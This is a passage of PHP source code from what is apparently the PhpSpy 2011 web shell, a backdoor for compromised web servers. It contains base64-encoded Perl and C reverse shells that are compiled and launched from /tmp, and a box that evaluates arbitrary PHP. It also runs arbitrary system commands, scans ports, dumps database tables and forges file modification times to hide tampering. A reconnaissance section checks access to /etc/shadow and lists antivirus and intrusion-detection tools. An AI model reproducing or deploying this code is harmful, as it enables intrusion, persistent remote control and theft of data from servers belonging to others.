2214		if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
2215
2216		$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
2217
2218		}
2219
2220
2221
2222		$result = q($query);
2223
2224
2225
2226		p($multipage);
2227
2228		p('<table border="0" cellpadding="3" cellspacing="0">');
2229
2230		p('<tr class="head">');
2231
2232		if ($allowedit) p('<td>Action</td>');
2233
2234		$fieldnum = @mysql_num_fields($result);
2235
2236		for($i=0;$i<$fieldnum;$i++){
2237
2238		$name = @mysql_field_name($result, $i);
2239
2240		$type = @mysql_field_type($result, $i);
2241
2242		$len = @mysql_field_len($result, $i);
2243
2244		p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' \|\| $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
2245
2246		}
2247
2248		p('</tr>');
2249
2250
2251
2252		while($mn = @mysql_fetch_assoc($result)){
2253
2254		$thisbg = bg();
2255
2256		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
2257
2258		$where = $tmp = $b1 = '';
2259
2260		//???????
2261
2262		foreach($mn as $key=>$inside){
2263
2264		if ($inside) {
2265
2266		//?????????????????,?????,?????????????
2267
2268		if ($rowdb[$key]['Key'] == 'UNI' \|\| $rowdb[$key]['Extra'] == 'auto_increment' \|\| $rowdb[$key]['Key'] == 'PRI') {
2269
2270		$where = $key."='".addslashes($inside)."'";
2271
2272		break;
2273
2274		}
2275
2276		$where .= $tmp.$key."='".addslashes($inside)."'";
2277
2278		$tmp = ' AND ';
2279
2280		}
2281
2282		}
2283
2284		//?????
2285
2286		foreach($mn as $key=>$inside){
2287
2288		$b1 .= '<td nowrap>'.html_clean($inside).' </td>';
2289
2290		}
2291
2292		$where = base64_encode($where);
2293
2294
2295
2296		if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> \| <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
2297
2298
2299
2300		p($b1);
2301
2302		p('</tr>');
2303
2304		unset($b1);
2305
2306		}
2307
2308		p('<tr class="head">');
2309
2310		if ($allowedit) p('<td>Action</td>');
2311
2312		$fieldnum = @mysql_num_fields($result);
2313
2314		for($i=0;$i<$fieldnum;$i++){
2315
2316		$name = @mysql_field_name($result, $i);
2317
2318		$type = @mysql_field_type($result, $i);
2319
2320		$len = @mysql_field_len($result, $i);
2321
2322		p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' \|\| $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
2323
2324		}
2325
2326		p('</tr>');
2327
2328		tbfoot();
2329
2330		p($multipage);
2331
2332		break;
2333
2334		case 2:
2335
2336		$ar = mysql_affected_rows();
2337
2338		p('<h2>affected rows : <b>'.$ar.'</b></h2>');
2339
2340		break;
2341
2342		}
2343
2344		}
2345
2346		}
2347
2348		}
2349
2350		} else {
2351
2352		$query = q("SHOW TABLE STATUS");
2353
2354		$table_num = $table_rows = $data_size = 0;
2355
2356		$tabledb = array();
2357
2358		while($table = mysql_fetch_array($query)) {
2359
2360		$data_size = $data_size + $table['Data_length'];
2361
2362		$table_rows = $table_rows + $table['Rows'];
2363
2364		$table['Data_length'] = sizecount($table['Data_length']);
2365
2366		$table_num++;
2367
2368		$tabledb[] = $table;
2369
2370		}
2371
2372		$data_size = sizecount($data_size);
2373
2374		unset($table);
2375
2376		p('<table border="0" cellpadding="0" cellspacing="0">');
2377
2378		p('<form action="'.$self.'" method="POST">');
2379
2380		makehide('action','mysqladmin');
2381
2382		p($dbform);
2383
2384		p('<tr class="head">');
2385
2386		p('<td width="2%" align="center"> </td>');
2387
2388		p('<td>Name</td>');
2389
2390		p('<td>Rows</td>');
2391
2392		p('<td>Data_length</td>');
2393
2394		p('<td>Create_time</td>');
2395
2396		p('<td>Update_time</td>');
2397
2398		if ($highver) {
2399
2400		p('<td>Engine</td>');
2401
2402		p('<td>Collation</td>');
2403
2404		}
2405
2406		p('<td>Operate</td>');
2407
2408		p('</tr>');
2409
2410		foreach ($tabledb as $key => $table) {
2411
2412		$thisbg = bg();
2413
2414		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
2415
2416		p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
2417
2418		p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
2419
2420		p('<td>'.$table['Rows'].'</td>');
2421
2422		p('<td>'.$table['Data_length'].'</td>');
2423
2424		p('<td>'.$table['Create_time'].' </td>');
2425
2426		p('<td>'.$table['Update_time'].' </td>');
2427
2428		if ($highver) {
2429
2430		p('<td>'.$table['Engine'].'</td>');
2431
2432		p('<td>'.$table['Collation'].'</td>');
2433
2434		}
2435
2436		p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> \| <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> \| <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
2437
2438		p('</tr>');
2439
2440		}
2441
2442		p('<tr class="head">');
2443
2444		p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
2445
2446		p('<td>Name</td>');
2447
2448		p('<td>Rows</td>');
2449
2450		p('<td>Data_length</td>');
2451
2452		p('<td>Create_time</td>');
2453
2454		p('<td>Update_time</td>');
2455
2456		if ($highver) {
2457
2458		p('<td>Engine</td>');
2459
2460		p('<td>Collation</td>');
2461
2462		}
2463
2464		p('<td>Operate</td>');
2465
2466		p('</tr>');
2467
2468		p('<tr class='.bg().'>');
2469
2470		p('<td> </td>');
2471
2472		p('<td>Total tables: '.$table_num.'</td>');
2473
2474		p('<td>'.$table_rows.'</td>');
2475
2476		p('<td>'.$data_size.'</td>');
2477
2478		p('<td colspan="'.($highver ? 5 : 3).'"> </td>');
2479
2480		p('</tr>');
2481
2482
2483
2484		p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
2485
2486		makehide('doing','backupmysql');
2487
2488		formfoot();
2489
2490		p("</table>");
2491
2492		fr($query);
2493
2494		}
2495
2496		}
2497
2498		}
2499
2500		tbfoot();
2501
2502		@mysql_close();
2503
2504		}//end mysql
2505
2506
2507
2508		elseif ($action == 'backconnect') {
2509
2510		!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
2511
2512		!$yourport && $yourport = '12345';
2513
2514		$usedb = array('perl'=>'perl','c'=>'c');
2515
2516
2517
2518		$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
2519
2520		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
2521
2522		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
2523
2524		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
2525
2526		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
2527
2528		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
2529
2530		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2531
2532		$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
2533
2534		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
2535
2536		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
2537
2538		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
2539
2540		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
2541
2542		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
2543
2544		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
2545
2546		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2547
2548
2549
2550		if ($start && $yourip && $yourport && $use){
2551
2552		if ($use == 'perl') {
2553
2554		cf('/tmp/angel_bc',$back_connect);
2555
2556		$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
2557
2558		} else {
2559
2560		cf('/tmp/angel_bc.c',$back_connect_c);
2561
2562		$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
2563
2564		@unlink('/tmp/angel_bc.c');
2565
2566		$res = execute("/tmp/angel_bc $yourip $yourport &");
2567
2568		}
2569
2570		m("Now script try connect to $yourip port $yourport ...");
2571
2572		}
2573
2574
2575
2576		formhead(array('title'=>'Back Connect'));
2577
2578		makehide('action','backconnect');
2579
2580		p('<p>');
2581
2582		p('Your IP:');
2583
2584		makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
2585
2586		p('Your Port:');
2587
2588		makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
2589
2590		p('Use:');
2591
2592		makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
2593
2594		makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
2595
2596		p('</p>');
2597
2598		formfoot();
2599
2600		}//end
2601
2602
2603
2604		elseif ($action == 'portscan') {
2605
2606		!$scanip && $scanip = '127.0.0.1';
2607
2608		!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
2609
2610		formhead(array('title'=>'Port Scan'));
2611
2612		makehide('action','portscan');
2613
2614		p('<p>');
2615
2616		p('IP:');
2617
2618		makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
2619
2620		p('Port:');
2621
2622		makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
2623
2624		makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
2625
2626		p('</p>');
2627
2628		formfoot();
2629
2630
2631
2632		if ($startscan) {
2633
2634		p('<h2>Result »</h2>');
2635
2636		p('<ul class="info">');
2637
2638		foreach(explode(',', $scanport) as $port) {
2639
2640		$fp = fsockopen($scanip, $port, $errno, $errstr, 1);
2641
2642		if (!$fp) {
2643
2644		p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
2645
2646		} else {
2647
2648		p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
2649
2650		@fclose($fp);
2651
2652		}
2653
2654		}
2655
2656		p('</ul>');
2657
2658		}
2659
2660		}
2661
2662
2663
2664		elseif ($action == 'eval') {
2665
2666		$phpcode = trim($phpcode);
2667
2668		if($phpcode){
2669
2670		if (!preg_match('#<\?#si', $phpcode)) {
2671
2672		$phpcode = "<?php\n\n{$phpcode}\n\n?>";
2673
2674		}
2675
2676		eval("?".">$phpcode<?");
2677
2678		}
2679
2680		formhead(array('title'=>'Eval PHP Code'));
2681
2682		makehide('action','eval');
2683
2684		maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
2685
2686		p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
2687
2688		formfooter();
2689
2690		}//end eval
2691
2692
2693
2694		elseif ($action == 'editfile') {
2695
2696		if(file_exists($opfile)) {
2697
2698		$fp=@fopen($opfile,'r');
2699
2700		$contents=@fread($fp, filesize($opfile));
2701
2702		@fclose($fp);
2703
2704		$contents=htmlspecialchars($contents);
2705
2706		}
2707
2708		formhead(array('title'=>'Create / Edit File'));
2709
2710		makehide('action','file');
2711
2712		makehide('dir',$nowpath);
2713
2714		makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
2715
2716		maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
2717
2718		formfooter();
2719
2720
2721
2722		goback();
2723
2724
2725
2726		}//end editfile
2727
2728
2729
2730		elseif ($action == 'newtime') {
2731
2732		$opfilemtime = @filemtime($opfile);
2733
2734		//$time = strtotime("$year-$month-$day $hour:$minute:$second");
2735
2736		$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
2737
2738		formhead(array('title'=>'Clone folder/file was last modified time'));
2739
2740		makehide('action','file');
2741
2742		makehide('dir',$nowpath);
2743
2744		makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
2745
2746		makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
2747
2748		formfooter();
2749
2750		formhead(array('title'=>'Set last modified'));
2751
2752		makehide('action','file');
2753
2754		makehide('dir',$nowpath);
2755
2756		makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
2757
2758		p('<p>year:');
2759
2760		makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
2761
2762		p('month:');
2763
2764		makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
2765
2766		p('day:');
2767
2768		makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
2769
2770		p('hour:');
2771
2772		makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
2773
2774		p('minute:');
2775
2776		makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
2777
2778		p('second:');
2779
2780		makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
2781
2782		p('</p>');
2783
2784		formfooter();
2785
2786		goback();
2787
2788		}//end newtime
2789
2790
2791
2792		elseif ($action == 'shell') {
2793
2794		if (IS_WIN && IS_COM) {
2795
2796		if($program && $parameter) {
2797
2798		$shell= new COM('Shell.Application');
2799
2800		$a = $shell->ShellExecute($program,$parameter);
2801
2802		m('Program run has '.(!$a ? 'success' : 'fail'));
2803
2804		}
2805
2806		!$program && $program = 'c:\windows\system32\cmd.exe';
2807
2808		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
2809
2810		formhead(array('title'=>'Execute Program'));
2811
2812		makehide('action','shell');
2813
2814		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
2815
2816		p('<p>');
2817
2818		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
2819
2820		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
2821
2822		p('</p>');
2823
2824		formfoot();
2825
2826		}
2827
2828		formhead(array('title'=>'Execute Command'));
2829
2830		makehide('action','shell');
2831
2832		if (IS_WIN && IS_COM) {
2833
2834		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
2835
2836		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
2837
2838		}
2839
2840		p('<p>');
2841
2842		makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
2843
2844		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
2845
2846		p('</p>');
2847
2848		formfoot();
2849
2850
2851
2852		if ($command) {
2853
2854		p('<hr width="100%" noshade /><pre>');
2855
2856		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
2857
2858		$wsh = new COM('WScript.shell');
2859
2860		$exec = $wsh->exec('cmd.exe /c '.$command);
2861
2862		$stdout = $exec->StdOut();
2863
2864		$stroutput = $stdout->ReadAll();
2865
2866		echo $stroutput;
2867
2868		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
2869
2870		$descriptorspec = array(
2871
2872		0 => array('pipe', 'r'),
2873
2874		1 => array('pipe', 'w'),
2875
2876		2 => array('pipe', 'w')
2877
2878		);
2879
2880		$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
2881
2882		if (is_resource($process)) {
2883
2884		fwrite($pipes[0], $command."\r\n");
2885
2886		fwrite($pipes[0], "exit\r\n");
2887
2888		fclose($pipes[0]);
2889
2890		while (!feof($pipes[1])) {
2891
2892		echo fgets($pipes[1], 1024);
2893
2894		}
2895
2896		fclose($pipes[1]);
2897
2898		while (!feof($pipes[2])) {
2899
2900		echo fgets($pipes[2], 1024);
2901
2902		}
2903
2904		fclose($pipes[2]);
2905
2906		proc_close($process);
2907
2908		}
2909
2910		} else {
2911
2912		echo(execute($command));
2913
2914		}
2915
2916		p('</pre>');
2917
2918		}
2919
2920		}//end shell
2921
2922
2923
2924		elseif ($action == 'phpenv') {
2925
2926		$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
2927
2928		$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
2929
2930		!$dis_func && $dis_func = 'No';
2931
2932		$info = array(
2933
2934		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
2935
2936		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
2937
2938		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
2939
2940		4 => array('Server OS',PHP_OS),
2941
2942		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
2943
2944		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
2945
2946		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
2947
2948		8 => array('PHP run mode',strtoupper(php_sapi_name())),
2949
2950		9 => array('The file path',__FILE__),
2951
2952
2953
2954		10 => array('PHP Version',PHP_VERSION),
2955
2956		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
2957
2958		12 => array('Safe Mode',getcfg('safe_mode')),
2959
2960		13 => array('Administrator',$adminmail),
2961
2962		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
2963
2964		15 => array('enable_dl',getcfg('enable_dl')),
2965
2966		16 => array('display_errors',getcfg('display_errors')),
2967
2968		17 => array('register_globals',getcfg('register_globals')),
2969
2970		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
2971
2972		19 => array('memory_limit',getcfg('memory_limit')),
2973
2974		20 => array('post_max_size',getcfg('post_max_size')),
2975
2976		21 => array('upload_max_filesize',$upsize),
2977
2978		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
2979
2980		23 => array('disable_functions',$dis_func),
2981
2982		);
2983
2984
2985
2986		if($phpvarname) {
2987
2988		m($phpvarname .' : '.getcfg($phpvarname));
2989
2990		}
2991
2992
2993
2994		formhead(array('title'=>'Server environment'));
2995
2996		makehide('action','phpenv');
2997
2998		makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
2999
3000		formfooter();
3001
3002
3003
3004		$hp = array(0=> 'Server', 1=> 'PHP');
3005
3006		for($a=0;$a<2;$a++) {
3007
3008		p('<h2>'.$hp[$a].' »</h2>');
3009
3010		p('<ul class="info">');
3011
3012		if ($a==0) {
3013
3014		for($i=1;$i<=9;$i++) {
3015
3016		p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
3017
3018		}
3019
3020		} elseif ($a == 1) {
3021
3022		for($i=10;$i<=23;$i++) {
3023
3024		p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
3025
3026		}
3027
3028		}
3029
3030		p('</ul>');
3031
3032		}
3033
3034		}//end phpenv
3035
3036
3037
3038		elseif ($action == 'secinfo') {
3039
3040
3041
3042		secparam('Server software', @getenv('SERVER_SOFTWARE'));
3043
3044		secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
3045
3046		secparam('Open base dir', @ini_get('open_basedir'));
3047
3048		secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
3049
3050		secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
3051
3052		secparam('cURL support', function_exists('curl_version')?'enabled':'no');
3053
3054		$temp=array();
3055
3056		if(function_exists('mysql_get_client_info'))
3057
3058		$temp[] = "MySql (".mysql_get_client_info().")";
3059
3060		if(function_exists('mssql_connect'))
3061
3062		$temp[] = "MSSQL";
3063
3064		if(function_exists('pg_connect'))
3065
3066		$temp[] = "PostgreSQL";
3067
3068		if(function_exists('oci_connect'))
3069
3070		$temp[] = "Oracle";
3071
3072		secparam('Supported databases', implode(', ', $temp));
3073
3074
3075
3076		if( !IS_WIN ) {
3077
3078		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
3079
3080		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
3081
3082		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
3083
3084		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
3085
3086		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
3087
3088		secparam('OS version', @file_get_contents('/proc/version'));
3089
3090		secparam('Distr name', @file_get_contents('/etc/issue.net'));
3091
3092		$safe_mode = @ini_get('safe_mode');
3093
3094		if(!$GLOBALS['safe_mode']) {
3095
3096		$temp=array();
3097
3098		foreach ($userful as $item)
3099
3100		if(which($item)){$temp[]=$item;}
3101
3102		secparam('Userful', implode(', ',$temp));
3103
3104		$temp=array();
3105
3106		foreach ($danger as $item)
3107
3108		if(which($item)){$temp[]=$item;}
3109
3110		secparam('Danger', implode(', ',$temp));
3111
3112		$temp=array();
3113
3114		foreach ($downloaders as $item)
3115
3116		if(which($item)){$temp[]=$item;}
3117
3118		secparam('Downloaders', implode(', ',$temp));
3119
3120		secparam('Hosts', @file_get_contents('/etc/hosts'));
3121
3122		secparam('HDD space', execute('df -h'));
3123
3124		secparam('Mount options', @file_get_contents('/etc/fstab'));
3125
3126		}
3127
3128		} else {
3129
3130		secparam('OS Version',execute('ver'));
3131
3132		secparam('Account Settings',execute('net accounts'));
3133
3134		secparam('User Accounts',execute('net user'));
3135
3136		secparam('IP Configurate',execute('ipconfig -all'));
3137
3138		}
3139
3140		}//end
3141
3142
3143
3144		else {
3145
3146		m('Undefined Action');
3147
3148		}
3149
3150
3151
3152		?>
3153
3154		</td></tr></table>
3155
3156		<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
3157
3158		<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
3159
3160		Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
3161
3162		</div>
3163
3164		</body>
3165
3166		</html>
3167
3168
3169
3170		<?php
3171
3172
3173
3174		/*======================================================
3175
3176		???
3177
3178		======================================================*/
3179
3180
3181
3182		function secparam($n, $v) {
3183
3184		$v = trim($v);
3185
3186		if($v) {
3187
3188		p('<h2>'.$n.' »</h2>');
3189
3190		p('<div class="infolist">');
3191
3192		if(strpos($v, "\n") === false)
3193
3194		p($v.'<br />');
3195
3196		else
3197
3198		p('<pre>'.$v.'</pre>');
3199
3200		p('</div>');
3201
3202		}
3203
3204		}
3205
3206		function m($msg) {
3207
3208		echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
3209
3210		echo $msg;
3211
3212		echo '</div>';
3213
3214		}
3215
3216		function scookie($key, $value, $life = 0, $prefix = 1) {
3217
3218		global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
3219
3220		$key = ($prefix ? $cookiepre : '').$key;
3221
3222		$life = $life ? $life : $cookielife;
3223
3224		$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
3225
3226		setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
3227
3228		}
3229
3230		function multi($num, $perpage, $curpage, $tablename) {
3231
3232		$multipage = '';
3233
3234		if($num > $perpage) {
3235
3236		$page = 10;
3237
3238		$offset = 5;
3239
3240		$pages = @ceil($num / $perpage);
3241
3242		if($page > $pages) {
3243
3244		$from = 1;
3245
3246		$to = $pages;
3247
3248		} else {
3249
3250		$from = $curpage - $offset;
3251
3252		$to = $curpage + $page - $offset - 1;
3253
3254		if($from < 1) {
3255
3256		$to = $curpage + 1 - $from;
3257
3258		$from = 1;
3259
3260		if(($to - $from) < $page && ($to - $from) < $pages) {
3261
3262		$to = $page;
3263
3264		}
3265
3266		} elseif($to > $pages) {
3267
3268		$from = $curpage - $pages + $to;
3269
3270		$to = $pages;
3271
3272		if(($to - $from) < $page && ($to - $from) < $pages) {
3273
3274		$from = $pages - $page + 1;
3275
3276		}
3277
3278		}
3279
3280		}
3281
3282		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
3283
3284		for($i = $from; $i <= $to; $i++) {
3285
3286		$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
3287
3288		}
3289
3290		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
3291
3292		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
3293
3294		}
3295
3296		return $multipage;
3297
3298		}
3299
3300		// ????
3301
3302		function loginpage() {
3303
3304		?>
3305
3306		<style type="text/css">
3307
3308		input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
3309
3310		</style>
3311
3312		<form method="POST" action="">
3313
3314		<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
3315
3316		<input type="hidden" name="action" value="login">
3317
3318		<input type="submit" value="Login">
3319
3320		</form>
3321
3322		<?php
3323
3324		exit;
3325
3326		}//end loginpage()
3327
3328
3329
3330		function execute($cfe) {
3331
3332		$res = '';
3333
3334		if ($cfe) {
3335
3336		if(function_exists('system')) {
3337
3338		@ob_start();
3339
3340		@system($cfe);
3341
3342		$res = @ob_get_contents();
3343
3344		@ob_end_clean();
3345
3346		} elseif(function_exists('passthru')) {
3347
3348		@ob_start();
3349
3350		@passthru($cfe);
3351
3352		$res = @ob_get_contents();
3353
3354		@ob_end_clean();
3355
3356		} elseif(function_exists('shell_exec')) {
3357
3358		$res = @shell_exec($cfe);
3359
3360		} elseif(function_exists('exec')) {
3361
3362		@exec($cfe,$res);
3363
3364		$res = join("\n",$res);
3365
3366		} elseif(@is_resource($f = @popen($cfe,"r"))) {
3367
3368		$res = '';
3369
3370		while(!@feof($f)) {
3371
3372		$res .= @fread($f,1024);
3373
